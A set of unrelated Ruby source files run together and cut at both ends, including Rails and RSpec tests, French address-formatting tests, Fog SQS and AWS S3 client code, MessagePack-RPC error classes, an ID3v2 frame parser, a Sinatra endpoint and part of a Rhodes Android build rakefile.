have_content(@application_form.full_name) click_button t('continue') end def and_i_can_see_that_no_courses_are_selected expect(page).to have_content('Choose your courses Incomplete') click_link 'Choose your courses' expect(page).to have_content 'You can apply for up to 3 courses' end def when_i_visit_the_carry_over_page_again visit candidate_interface_start_carry_over_path end def then_i_am_redirected_to_my_existing_application then_i_can_see_application_details end end
App::Application.configure do # Settings specified here will take precedence over those in config/application.rb # The test environment is used exclusively to run your application's # test suite. You never need to work with it otherwise. Remember that # your test database is "scratch space" for the test suite and is wiped # and recreated between test runs. Don't rely on the data there! config.cache_classes = true # Configure static asset server for tests with Cache-Control for performance if config.respond_to?(:serve_static_files) config.serve_static_files = true else # Remove when we drop Rails 4.1 config.serve_static_assets = true end config.static_cache_control = "public, max-age=3600" # Show full error reports and disable caching config.consider_all_requests_local = true config.action_controller.perform_caching = false # Raise exceptions instead of rendering exception templates config.action_dispatch.show_exceptions = false # Disable request forgery protection in test environment config.action_controller.allow_forgery_protection = false # Print deprecation notices to the stderr config.active_support.deprecation = :stderr config.eager_load = false end
# frozen_string_literal: true require 'spec_helper' require Rails.root.join('db', 'migrate', '20191004081520_fill_productivity_analytics_start_date.rb') RSpec.describe FillProductivityAnalyticsStartDate do let(:settings_table) { table('application_settings') } let(:metrics_table) { table('merge_request_metrics') } before do settings_table.create! end context 'with NO productivity analytics data available' do it 'sets start_date to NOW' do expect { migrate! }.to change { settings_table.first&.productivity_analytics_start_date }.to(be_like_time(Time.now)) end end context 'with productivity analytics data available' do before do ActiveRecord::Base.transaction do ActiveRecord::Base.connection.execute('ALTER TABLE merge_request_metrics DISABLE TRIGGER ALL') metrics_table.create!(merged_at: Time.parse('2019-09-09'), commits_count: nil, merge_request_id: 3) metrics_table.create!(merged_at: Time.parse('2019-10-10'), commits_count: 5, merge_request_id: 1) metrics_table.create!(merged_at: Time.parse('2019-11-11'), commits_count: 10, merge_request_id: 2) ActiveRecord::Base.connection.execute('ALTER TABLE merge_request_metrics ENABLE TRIGGER ALL') end end it 'set start_date to earliest merged_at value with PA data available' do expect { migrate! }.to change { settings_table.first&.productivity_analytics_start_date }.to(be_like_time(Time.parse('2019-10-10'))) end end end
# frozen_string_literal: true require "test_helper" class RespLegalTest < ActiveSupport::TestCase def test_a_un_fabricant_valid assert Fabricate.build(:resp_legal).valid? end def test_detection_adresses_identiques_cas_degenere assert RespLegal.new.adresse_inchangee? end def test_detection_adresses_identiques rl = RespLegal.new( adresse_ant: "4 IMPASSE MORLET", ville_ant: "PARIS", code_postal_ant: "75011", adresse: "4 impasse Morlet\n", ville: " Paris\r", code_postal: "75 011" ) assert rl.adresse_inchangee? end test "même adresse avec sois" do resp = RespLegal.new adresse: "42 rue", code_postal: "75020", ville: "Paris" assert resp.meme_adresse(resp) end test "même adresse même sur un autre resp" do resp = RespLegal.new adresse: "42 rue", code_postal: "75020", ville: "Paris" autre_resp = RespLegal.new( adresse: resp.adresse, code_postal: resp.code_postal, ville: resp.ville ) assert resp.meme_adresse(autre_resp) end test "nil n'est pas une même adresse" do resp = RespLegal.new adresse: "42 rue", code_postal: "75020", ville: "Paris" assert !resp.meme_adresse(nil) end test "si adresse est différent, ce n'est pas une même adresse" do resp = RespLegal.new adresse: "42 rue", code_postal: "75020", ville: "Paris" assert !resp.meme_adresse(RespLegal.new( adresse: "30", code_postal: resp.code_postal, ville: resp.ville )) end test "si le code_postal est différent, ce n'est pas une même adresse" do resp = RespLegal.new adresse: "42 rue", code_postal: "75020", ville: "Paris" assert !resp.meme_adresse(RespLegal.new( adresse: resp.adresse, code_postal: "59001", ville: resp.ville )) end test "si la ville est différent, ce n'est pas une même adresse" do resp = RespLegal.new adresse: "42 rue", code_postal: "75020", ville: "Paris" assert !resp.meme_adresse(RespLegal.new( adresse: resp.adresse, code_postal: resp.code_postal, ville: "Lyon" )) end def test_adresse_inchangee_si_ancienne_vide responsable_legal = RespLegal.new( adresse: "42 rue", code_postal: "75020", ville: "Paris", adresse_ant: nil, ville_ant: nil, code_postal_ant: nil ) assert responsable_legal.adresse_inchangee? end test "renvoie un tableau vide si aucun moyen de communication renseigné" do representant = Fabricate.build(:resp_legal, email: nil, tel_personnel: nil, tel_portable: nil, tel_professionnel: nil) assert_equal [], representant.moyens_de_communication end test "renvoie l'email si renseigné" do representant = Fabricate.build(:resp_legal, email: "[email protected]", tel_personnel: nil, tel_portable: nil, tel_professionnel: nil) assert_equal ["[email protected]"], representant.moyens_de_communication end test "renvoie tel_professionnel si renseigné" do representant = Fabricate.build(:resp_legal, email: nil, tel_personnel: nil, tel_portable: nil, tel_professionnel: "0123456789") assert_equal ["0123456789"], representant.moyens_de_communication end test "renvoie tous les moyens de communication si tous renseignés" do representant = Fabricate.build(:resp_legal, email: "[email protected]", tel_personnel: "01111111111", tel_portable: "06666666666", tel_professionnel: "0123456789") assert_equal ["[email protected]", "01111111111", "0123456789", "06666666666"].sort, representant.moyens_de_communication.sort end test "nom_complet renvoie prénom et nom" do representant = Fabricate(:resp_legal, nom: "Marley", prenom: "Bob") assert_equal "Bob Marley", representant.nom_complet end test "tronque si pas de separateur" do adresse = "100 Back Street Paradise 11201 BROOKLYN NY / USA" resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "100 Back Street Paradise 11201", resp_legal.ligne1_adresse_siecle assert_equal "BROOKLYN NY / USA", resp_legal.ligne2_adresse_siecle end test "aller jusqu'à 4 ligne d'adresse" do adresse = "Résidence le claricy 1 bâtiment C appart 4760 3 éme étage 290 vois des hauts de clairicy " # adresse = "Résidence le claricy 1 bâtiment C appart 4760 3 éme étage\r\n290 vois des hauts de clairicy " resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "Résidence le claricy 1 bâtiment C", resp_legal.ligne1_adresse_siecle assert_equal "appart 4760 3 éme étage 290 vois des", resp_legal.ligne2_adresse_siecle # assert_equal "appart 4760 3 éme étage\r\n290 vois des", resp_legal.ligne2_adresse_siecle assert_equal "hauts de clairicy", resp_legal.ligne3_adresse_siecle assert resp_legal.ligne1_adresse_siecle.length <= 38 assert resp_legal.ligne2_adresse_siecle.length <= 38 assert resp_legal.ligne3_adresse_siecle.length <= 38 end test "découpe une adresse sur trois lignes en se fondant sur les retours à la ligne" do adresse = <<~HERE 20 RUE DU VILLAGE DE MOINS DE 38 VILLE DE MOINS DE 38 BAT G HERE resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "20 RUE DU VILLAGE DE MOINS DE 38", resp_legal.ligne1_adresse_siecle assert_equal "VILLE DE MOINS DE 38", resp_legal.ligne2_adresse_siecle assert_equal "BAT G", resp_legal.ligne3_adresse_siecle end test "découpe une adresse en se fondant sur les retours à la ligne et la limite des 38 caractères pour la 1ère ligne" do adresse = <<~HERE 20 RUE DU VILLAGE DE PLUS DE 38 CARACTERES VILLE HERE resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "20 RUE DU VILLAGE DE PLUS DE 38", resp_legal.ligne1_adresse_siecle assert_equal "CARACTERES", resp_legal.ligne2_adresse_siecle assert_equal "VILLE", resp_legal.ligne3_adresse_siecle end test "découpe une adresse sur 4 lignes" do adresse = <<~HERE 20 RUE DU VILLAGE DE PLUS DE 38 CARACTERES VILLE TRES LONGUE DE PLUS DE 38 CARACTERES DU NOM DE VILLE HERE resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "20 RUE DU VILLAGE DE PLUS DE 38", resp_legal.ligne1_adresse_siecle assert_equal "CARACTERES", resp_legal.ligne2_adresse_siecle assert_equal "VILLE TRES LONGUE DE PLUS DE 38", resp_legal.ligne3_adresse_siecle assert_equal "CARACTERES DU NOM DE VILLE", resp_legal.ligne4_adresse_siecle end test "découpe une adresse malgré des lignes vides superflues" do adresse = <<~HERE 20 RUE DU VILLAGE VILLE HERE resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "20 RUE DU VILLAGE", resp_legal.ligne1_adresse_siecle assert_equal "VILLE", resp_legal.ligne2_adresse_siecle end test "découpe une adresse avec \r et \n" do adresse = "20 RUE DU VILLAGE\r\n \r\r VILLE" resp_legal = Fabricate(:resp_legal, adresse: adresse) assert_equal "20 RUE DU VILLAGE", resp_legal.ligne1_adresse_siecle assert_equal "VILLE", resp_legal.ligne2_adresse_siecle end end
module Fog module AWS class SQS class Real require 'fog/aws/parsers/sqs/send_message' # Add a message to a queue # # ==== Parameters # * queue_url<~String> - Url of queue to add message to # * message<~String> - Message to add to queue # # ==== See Also # http://docs.amazonwebservices.com/AWSSimpleQueueService/latest/APIReference/Query_QuerySendMessage.html # def send_message(queue_url, message) request({ 'Action' => 'SendMessage', 'MessageBody' => message, :path => path_from_queue_url(queue_url), :parser => Fog::Parsers::AWS::SQS::SendMessage.new }) end end class Mock def send_message(queue_url, message) Fog::AWS::Mock.message_response(:sns, data[:queues][queue_url], message, options) end end end end end
require File.dirname(__FILE__) + '/../lib/em/spec' require 'bacon' require File.dirname(__FILE__) + '/../lib/em/spec/bacon' EM.spec_backend = EventMachine::Spec::Bacon describe 'Bacon' do should 'work as normal outside EM.describe' do 1.should == 1 end end EM.describe EventMachine do should 'work' do done end should 'have timers' do start = Time.now EM.add_timer(0.5){ (Time.now-start).should.be.close 0.5, 0.1 done } end should 'have periodic timers' do num = 0 start = Time.now timer = EM.add_periodic_timer(0.5){ if (num += 1) == 2 (Time.now-start).should.be.close 1.0, 0.1 EM.__send__ :cancel_timer, timer done end } end should 'have deferrables' do defr = EM::DefaultDeferrable.new defr.timeout(1) defr.errback{ done } end # it "should not block on failure" do # 1.should == 2 # end end
class RenameOrderItemsToLineItems < ActiveRecord::Migration def change rename_table :glysellin_order_items, :glysellin_line_items end end
# # MessagePack-RPC for Ruby # # Copyright (C) 2010-2011 FURUHASHI Sadayuki # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # module MessagePack module RPC class Error < StandardError end ## ## MessagePack-RPC Exception ## # # RPCError # | # +-- TimeoutError # | # +-- TransportError # | | # | +-- NetworkUnreachableError # | | # | +-- ConnectionRefusedError # | | # | +-- ConnectionTimeoutError # | | # | +-- MalformedMessageError # | | # | +-- StreamClosedError # | # +-- CallError # | | # | +-- NoMethodError # | | # | +-- ArgumentError # | # +-- ServerError # | | # | +-- ServerBusyError # | # +-- RemoteError # | # +-- RuntimeError # | # +-- (user-defined errors) class RPCError < Error def initialize(code, *data) @code = code.to_s @data = data super(@data.shift || @code) end attr_reader :code attr_reader :data def is?(code) if code.is_a?(Class) && code < RPCError if code == RemoteError return @code[0] != ?. end code = code::CODE end @code == code || @code[0,code.length+1] == "#{code}." end end ## # Top Level Errors # class TimeoutError < RPCError CODE = ".TimeoutError" def initialize(msg) super(self.class::CODE, msg) end end class TransportError < RPCError CODE = ".TransportError" def initialize(msg) super(self.class::CODE, msg) end end class CallError < RPCError CODE = ".CallError" def initialize(msg) super(self.class::CODE, msg) end end class ServerError < RPCError CODE = ".ServerError" def initialize(msg) super(self.class::CODE, msg) end end class RemoteError < RPCError CODE = "" def initialize(code, *data) super(code, *data) end end ## # TransportError # class NetworkUnreachableError < TransportError CODE = ".TransportError.NetworkUnreachableError" end class ConnectionRefusedError < TransportError CODE = ".TransportError.ConnectionRefusedError" end class ConnectionTimeoutError < TransportError CODE = ".TransportError.ConnectionTimeoutError" end class MalformedMessageError < TransportError CODE = ".TransportError.ConnectionRefusedError" end class StreamClosedError < TransportError CODE = ".TransportError.StreamClosedError" end ## # CallError # class NoMethodError < CallError CODE = ".CallError.NoMethodError" end class ArgumentError < CallError CODE = ".CallError.ArgumentError" end ## # ServerError # class ServerBusyError < ServerError CODE = ".ServerError.ServerBusyError" end ## # RuntimeError # class RuntimeError < RemoteError CODE = ".RuntimeError" def initialize(msg, *data) super("RuntimeError", msg, *data) end end class RPCError def self.create(code, data) if code[0] == ?. code = code.dup while true if klass = SYSTEM_ERROR_TABLE[code] return klass.new(*data) end if code.slice!(/\.[^\.]*$/) == nil || code.empty? return RPCError.new(code, *data) end end elsif code == RuntimeError::CODE RuntimeError.new(*data) else RemoteError.new(code, *data) end end private SYSTEM_ERROR_TABLE = { TimeoutError::CODE => TimeoutError, TransportError::CODE => TransportError, CallError::CODE => CallError, ServerError::CODE => ServerError, NetworkUnreachableError::CODE => NetworkUnreachableError, ConnectionRefusedError::CODE => ConnectionRefusedError, ConnectionTimeoutError::CODE => ConnectionTimeoutError, MalformedMessageError::CODE => MalformedMessageError, StreamClosedError::CODE => StreamClosedError, NoMethodError::CODE => NoMethodError, ArgumentError::CODE => ArgumentError, ServerBusyError::CODE => ServerBusyError, } end end end
Before("@lambdapreview") do @service = Aws::LambdaPreview::Resource.new @client = @service.client end After("@lambdapreview") do # shared cleanup logic end
# Copyright 2011-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. require 'uri' require 'time' module AWS class S3 # @api private class Request < Core::Http::Request include Core::UriEscape # @return [bucket] S3 bucket name attr_accessor :bucket # @return [String] S3 object key attr_accessor :key # @api private attr_accessor :force_path_style def host path_style? ? @host : "#{bucket}.#{@host}" end def path_style? if force_path_style true else Client.path_style_bucket_name?(bucket) end end def uri parts = [] parts << bucket if bucket and path_style? parts << escape_path(key) if key path = '/' + parts.join('/') querystring = url_encoded_params uri = '' uri << path uri << "?#{querystring}" if querystring uri end end end end
# frozen_string_literal: true # encoding: utf-8 require 'spec_helper' require 'runners/unified' base = "#{CURRENT_PATH}/spec_tests/data/crud_unified" CRUD_UNIFIED_TESTS = Dir.glob("#{base}/**/*.yml").sort describe 'CRUD unified spec tests' do define_unified_spec_tests(base, CRUD_UNIFIED_TESTS) end
# frozen_string_literal: true module Eve class UpdateCorporationJob < ActiveJob::Base queue_as :default retry_on EveOnline::Exceptions::Timeout, EveOnline::Exceptions::ServiceUnavailable, EveOnline::Exceptions::BadGateway, EveOnline::Exceptions::InternalServerError def perform(corporation_id) Eve::CorporationImporter.new(corporation_id).import end end end
# frozen_string_literal: true module Id3Taginator module Frames class Id3v2Frame include Extensions::Encodable include Extensions::ArgumentCheck HEADER_SIZE_V_3_4 = 10 HEADER_SIZE_V_2 = 6 attr_accessor :options attr_reader :frame_id # builds an id3v2.2 frame of the given frame id and the given data stream. The data stream(0) must be after # the frame id # # @param frame_id [String] the frame id # @param file [StringIO, IO, file] the data stream # @param options [Options::Options] the options to use # # @return [Id3v2Frame] the build id3v2.2 frame def self.build_v2_frame(frame_id, file, options) payload_size = Util::MathUtil.to_number(file.read(3)&.bytes) frame_payload = file.read(payload_size) raise Errors::Id3TagError, "Could not find any Frame data for #{frame_id}." if frame_payload.nil? instance = new(frame_id, payload_size, nil, frame_payload, HEADER_SIZE_V_2, nil) instance.options = options instance.process_content(frame_payload) instance end # builds an id3v2.3 frame of the given frame id and the given data stream. The data stream(0) must be after # the frame id # # @param frame_id [String] the frame id # @param file [StringIO, IO, file] the data stream # @param options [Options::Options] the options to use # # @return [Id3v2Frame] the build id3v2.3 frame def self.build_v3_frame(frame_id, file, options) payload_size = Util::MathUtil.to_number(file.read(4)&.bytes) flags = Id3v23FrameFlags.new(file.read(2)) decompressed_size = Util::MathUtil.to_number(file.read(4)&.bytes) if flags.compression? if flags.compression? compressed_data = file.read(payload_size) raise Errors::Id3TagError, "Could not find any Frame data for #{frame_id}." if compressed_data.nil? frame_payload = Util::CompressUtil.decompress_data(compressed_data) # noinspection RubyScope payload_size = decompressed_size else frame_payload = file.read(payload_size) end group_identify = nil if flags.group_identity? group_identify = frame_payload[0] frame_payload = frame_payload[1..-1] end raise Errors::Id3TagError, "Could not find any Frame data for #{frame_id}." if frame_payload.nil? instance = new(frame_id, payload_size, flags, frame_payload, HEADER_SIZE_V_3_4, group_identify) instance.options = options instance.process_content(frame_payload) instance end # builds an id3v2.4 frame of the given frame id and the given data stream. The data stream(0) must be after # the frame id # # @param frame_id [String] the frame id # @param file [StringIO, IO, file] the data stream # @param options [Options::Options] the options to use # # @return [Id3v2Frame] the build id3v2.4 frame def self.build_v4_frame(frame_id, file, options) payload_size = Util::MathUtil.to_32_synchsafe_integer(file.read(4)&.bytes) flags = Id3v24FrameFlags.new(file.read(2)) frame_payload = file.read(payload_size) raise Errors::Id3TagError, "Could not find any Frame data for #{frame_id}." if frame_payload.nil? frame_payload = Util::SyncUtil.undo_synchronization(StringIO.new(frame_payload)) if flags.unsynchronisation? frame_payload = Util::CompressUtil.decompress_data(frame_payload) if flags.compression? group_identify = nil if flags.group_identity? group_identify = frame_payload[0] frame_payload = frame_payload[1..-1] end raise Errors::Id3TagError, "Could not find any Frame data for #{frame_id}." if frame_payload.nil? instance = new(frame_id, payload_size, flags, frame_payload, HEADER_SIZE_V_3_4, group_identify) instance.options = options instance.process_content(frame_payload) instance end def self.build_id3_flags(version, flags = "\x00\x00") case version when 2 nil when 3 Id3v23FrameFlags.new(flags) when 4 Id3v24FrameFlags.new(flags) else raise Errors::Id3TagError, "Id3v.2.#{version} is not supported." end end # Constructor # # @param frame_id [String] the frame id # @param payload_size [Integer] the payload size (excludes header) # @param flags [Id3v23FrameFlags, Id3v24FrameFlags, nil] the frame flags # @param frame_payload [String] the decompressed and unsynchronized payload # @param header_size [Integer] the frame header size, 6 vor v2, 10 otherwise # @param group_identify [String, nil] the group identify if present def initialize(frame_id, payload_size, flags, frame_payload, header_size = 10, group_identify = nil) @header_size = header_size @frame_id = frame_id.to_sym @payload_size = payload_size @flags = flags @frame_payload = frame_payload @group_identity = group_identify end # processes the frame payload for the specific frame # # @param _content [String] the frame payload def process_content(_content) raise NotImplementedError, 'Implement this in a the actual frame class.' end # dumps the frame content to the byte representation as a String # # @return [String] the byte array as String def content_to_bytes raise NotImplementedError, 'Implement this in the actual frame class.' end # dumps the frame to a byte string. This dump already takes unsynchronization, padding and all other # options into effect # # @return [String] frame dump as a String. tag.bytes represents the byte array def to_bytes size_padding = @frame_id.to_s.length == 3 ? 6 : 8 payload = content_to_bytes payload_size_decompressed = Util::MathUtil.from_number(payload.length, size_padding) result = @frame_id.to_s if @flags&.compression? payload_compressed = Util::CompressUtil.compress_data(payload) payload_size_compressed = payload_compressed.size result += Util::MathUtil.from_number(payload_size_compressed, size_padding) else result += payload_size_decompressed end result += @flags.to_bytes unless @flags.nil? result += payload_size_decompressed if @flags&.compression? result += @group_identity if @flags&.group_identity? # noinspection RubyScope result += @flags&.compression? ? payload_compressed : payload result end # recalculates the payload size def re_calc_payload_size @payload_size = content_to_bytes.length end # calculates the frame size including header and payload, takes compression, group identity and everything # into effect # # @return [Integer] the frame size in bytes def frame_size compression = compression? ? 4 : 0 group_identity = group_identity? ? 1 : 0 # noinspection RubyMismatchedReturnType @header_size + @payload_size + compression + group_identity end # determined if the frame is alter preserved # # @return [Boolean] true if alter preserved, else false def tag_alter_preservation? return false if @flags.nil? @flags.tag_alter_preservation? end # determined if the file is alter preserved # # @return [Boolean] true if the file is alter preserved, else false def file_alter_preservation? return false if @flags.nil? @flags.file_alter_preservation? end # determined if the file frame is read only # # @return [Boolean] true if frame is read only, else false def read_only? return false if @flags.nil? @flags.read_only? end # determined if the frame is compressed # # @return [Boolean] true if the frame is compressed, else false def compression? return false if @flags.nil? @flags.compression? end # determined if the frame is encrypted # # @return [Boolean] true if the frame is encrypted, else false def encryption? return false if @flags.nil? @flags.encryption? end # determined if the frame has a group identity # # @return [Boolean] true if the frame has a group identity, else false def group_identity? return false if @flags.nil? @flags.group_identity? end end end end
require_relative '../../utils' require_relative './inflection/term' require_relative './inflection/part_of_speech' require_relative './inflection/declension' require_relative './inflection/case' require_relative './inflection/gender' require_relative './inflection/degree' require_relative './inflection/mood' require_relative './inflection/number' require_relative './inflection/person' require_relative './inflection/tense' require_relative './inflection/voice' require_relative './inflection/dialect' require_relative './inflection/stem_type' require_relative './inflection/derivation_type' require_relative './inflection/morphology' class Parser class Word class Entry class Inflection # rubocop:disable Metrics/MethodLength # rubocop:disable Metrics/AbcSize def initialize(doc) # rubocop:disable Metrics/CyclomaticComplexity doc.xpath('./*').each do |element| # rubocop:disable Metrics/BlockLength case element.name when 'term' @term = Term.new(element) when 'pofs' @part_of_speech = PartOfSpeech.new(element) when 'decl' @declension = Declension.new(element) when 'case' @case = Case.new(element) when 'gend' @gender = Gender.new(element) when 'comp' @degree = Degree.new(element) when 'mood' @mood = Mood.new(element) when 'num' @number = Number.new(element) when 'pers' @person = Person.new(element) when 'tense' @tense = Tense.new(element) when 'voice' @voice = Voice.new(element) when 'dial' @dialect = Dialect.new(element) when 'stemtype' @stem_type = StemType.new(element) when 'derivtype' @derivation_type = DerivationType.new(element) when 'morph' @morphology = Morphology.new(element) else raise Utils::NoMatchingClassError, element end end end # rubocop:enable Metrics/AbcSize # rubocop:enable Metrics/MethodLength def bamboo_xml @bamboo_xml ||= %(<infl>#{components.map(&:bamboo_xml).join("\n")}</infl>) end def bamboo_json @bamboo_json ||= components.reduce({}) { |m, n| m.merge!(n.bamboo_json) } end private def components # rubocop:disable Metrics/MethodLength [ @term, @part_of_speech, @declension, @case, @gender, @degree, @mood, @number, @person, @tense, @voice, @dialect, @stem_type, @derivation_type, @morphology, ].compact end end end end end
require 'sinatra' require 'json' typeToConversionType = { "scale" => method(:Integer), "bool" => ->(c) { (c.downcase == "true" || c.downcase == "yes") }, "string" => method(:String), "int" => method(:Integer), "float" => method(:String), "date" => method(:String) } post '/' do payload = JSON.parse(request.body.read) unless params[:path] logger.info "Recieved #{payload}" unless payload["structure"] status 500 return "JSON has have the key: structure" end unless payload["object"] status 500 return "JSON has have the key: object" end transformedObject = {} payload["object"].each do |key, currentValue| structureType = payload["structure"][key] if typeToConversionType.key?(structureType) convertedValue = typeToConversionType[structureType].call(currentValue) else convertedValue = currentValue end transformedObject[key] = convertedValue end content_type :json transformedObject.to_json end
#------------------------------------------------------------------------ # (The MIT License) # # Copyright (c) 2008-2011 Rhomobile, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # http://rhomobile.com #------------------------------------------------------------------------ require File.dirname(__FILE__) + '/androidcommon.rb' require File.dirname(__FILE__) + '/android_tools.rb' require File.dirname(__FILE__) + '/manifest_generator.rb' require File.dirname(__FILE__) + '/eclipse_project_generator.rb' require 'pathname' require 'tempfile' USE_OWN_STLPORT = false #USE_TRACES = # see androidcommon.rb def get_market_version(apilevel) AndroidTools.get_market_version(apilevel) end def get_api_level(version) AndroidTools.get_api_level(version) end JAVA_PACKAGE_NAME = 'com.rhomobile.rhodes' # Here is place were android platform should be specified. # For complete list of android API levels and its mapping to # market names (such as "Android-1.5" etc) see output of # command "android list targets" ANDROID_SDK_LEVEL = 4 ANDROID_PERMISSIONS = { 'audio' => ['RECORD_AUDIO', 'MODIFY_AUDIO_SETTINGS'], 'camera' => 'CAMERA', 'gps' => ['ACCESS_FINE_LOCATION', 'ACCESS_COARSE_LOCATION'], 'network_state' => 'ACCESS_NETWORK_STATE', 'phone' => ['CALL_PHONE', 'READ_PHONE_STATE'], 'pim' => ['READ_CONTACTS', 'WRITE_CONTACTS', 'GET_ACCOUNTS'], 'record_audio' => 'RECORD_AUDIO', 'vibrate' => 'VIBRATE', 'bluetooth' => ['BLUETOOTH_ADMIN', 'BLUETOOTH'], 'calendar' => ['READ_CALENDAR', 'WRITE_CALENDAR'], 'sdcard' => 'WRITE_EXTERNAL_STORAGE', 'push' => nil, 'motorola' => ['SYSTEM_ALERT_WINDOW', 'BROADCAST_STICKY', proc do |manifest| add_motosol_sdk(manifest) end], 'motoroladev' => ['SYSTEM_ALERT_WINDOW', 'BROADCAST_STICKY', proc do |manifest| add_motosol_sdk(manifest) end], 'webkit_browser' => nil, 'shared_runtime' => nil, 'motorola_browser' => nil, 'hardware_acceleration' => nil } ANDROID_CAPS_ALWAYS_ENABLED = ['network_state'] def add_motosol_sdk(manifest) uses_scanner = REXML::Element.new 'uses-library' uses_scanner.add_attribute 'android:name', 'com.motorolasolutions.scanner' uses_scanner.add_attribute 'android:required', 'false' uses_msr = REXML::Element.new 'uses-library' uses_msr.add_attribute 'android:name', 'com.motorolasolutions.emdk.msr' uses_msr.add_attribute 'android:required', 'false' manifest.elements.each('application') do |app| app.add uses_scanner app.add uses_msr end end def set_app_icon_android iconappname = File.join($app_path, "icon", "icon.png") ['drawable', 'drawable-hdpi', 'drawable-mdpi', 'drawable-ldpi'].each do |dpi| drawable = File.join($appres, dpi) iconresname = File.join(drawable, "icon.png") rm_f iconresname cp iconappname, iconresname if File.exist? drawable end end def set_app_name_android(newname) puts "set_app_name" $stdout.flush rm_rf $appres cp_r $rhores, $appres rhostrings = File.join($rhores, "values", "strings.xml") appstrings = File.join($appres, "values", "strings.xml") doc = REXML::Document.new(File.new(rhostrings)) doc.elements["resources/string[@name='app_name']"].text = newname File.open(appstrings, "w") { |f| doc.write f } end def get_boolean(arg) arg == 'true' or arg == 'yes' or arg == 'enabled' or arg == 'enable' or arg == '1' end namespace 'project' do namespace 'android' do task :eclipse => ['config:android', 'config:android:extensions','build:android:manifest'] do #options = [ 'create', 'project', # '--path', $projectpath, # '--target', $androidtargets[$found_api_level][:id], # '--package', $app_package_name, # '--activity', 'RhodesActivity' #] #Jake.run($androidbin, options) project_template_path = File.join 'res','generators','templates','project','android' project_erb_path = File.join project_template_path,'project.erb' classpath_erb_path = File.join project_template_path,'classpath.erb' project_prop_erb_path = File.join project_template_path,'project.properties.erb' manifest_path = File.join $tmpdir,'AndroidManifest.xml' project_path = File.join $app_path,'project','android' project_file_path = File.join project_path,'.project' classpath_file_path = File.join project_path,'.classpath' project_prop_file_path = File.join project_path,'project.properties' manifest_file_path = File.join project_path,'AndroidManifest.xml' rhodes_path = File.absolute_path '.' generator = EclipseProjectGenerator.new $appname, $app_path, rhodes_path, $androidtargets[$found_api_level][:name] $app_config["extpaths"].each do |extpath| next if extpath.start_with? rhodes_path generator.addVirtualFolder extpath end $ext_android_additional_sources.each do |extpath, list| classpaths = [] ext = File.basename(extpath) puts "Adding '#{ext}' extension java sources: #{list}" File.open(list, "r") do |f| while line = f.gets line.chomp! src = File.join(extpath, line) if src =~ /(.*\/src\/).*/ src = $1 unless classpaths.index(src) puts "Add classpath: #{src}" classpaths << src end end end end generator.addExtension(ext, classpaths) unless classpaths.empty? end mkdir_p project_path project_buf = generator.render project_erb_path File.open(project_file_path, "w") { |f| f.write project_buf } classpath_buf = generator.render classpath_erb_path File.open(classpath_file_path, "w") { |f| f.write classpath_buf } project_prop_buf = generator.render project_prop_erb_path File.open(project_prop_file_path, "w") { |f| f.write project_prop_buf } cp_r File.join(project_template_path,'externalToolBuilders'), File.join(project_path,'.externalToolBuilders') unless File.exists? File.join(project_path,'.externalToolBuilders') cp File.join(project_template_path,'gensources.xml'), project_path unless File.exists? File.join(project_path,'gensources.xml') cp File.join(project_template_path,'eclipsebundle.xml'), project_path unless File.exists? File.join(project_path,'eclipsebundle.xml') cp manifest_path, project_path end end end namespace "config" do task :set_android_platform do $current_platform = "android" end task :android => :set_android_platform do Rake::Task["config:common"].invoke $java = $config["env"]["paths"]["java"] $neon_root = nil $neon_root = $config["env"]["paths"]["neon"] unless $config["env"]["paths"].nil? if !($app_config["paths"].nil? or $app_config["paths"]["neon"].nil?) $neon_root = $app_config["paths"]["neon"] end $androidsdkpath = $config["env"]["paths"]["android"] unless File.exists? $androidsdkpath puts "Missing or invalid 'android' section in rhobuild.yml: '#{$androidsdkpath}'" exit 1 end $androidndkpath = $config["env"]["paths"]["android-ndk"] unless File.exists? $androidndkpath puts "Missing or invalid 'android-ndk' section in rhobuild.yml: '#{$androidndkpath}'" exit 1 end errfmt = "WARNING!!! Path to Android %s contain spaces! It will not work because of the Google toolchain restrictions. Move it to another location and reconfigure rhodes." if $androidndkpath =~ /\s/ puts(errfmt % "NDK") exit 1 end $min_sdk_level = $app_config["android"]["minSDK"] unless $app_config["android"].nil? $min_sdk_level = $config["android"]["minSDK"] if $min_sdk_level.nil? and not $config["android"].nil? $min_sdk_level = $min_sdk_level.to_i unless $min_sdk_level.nil? $min_sdk_level = ANDROID_SDK_LEVEL if $min_sdk_level.nil? $max_sdk_level = $app_config["android"]["maxSDK"] unless $app_config["android"].nil? $androidplatform = AndroidTools.fill_api_levels $androidsdkpath if $androidplatform == nil puts "No Android platform found at SDK path: '#{$androidsdkpath}'" exit 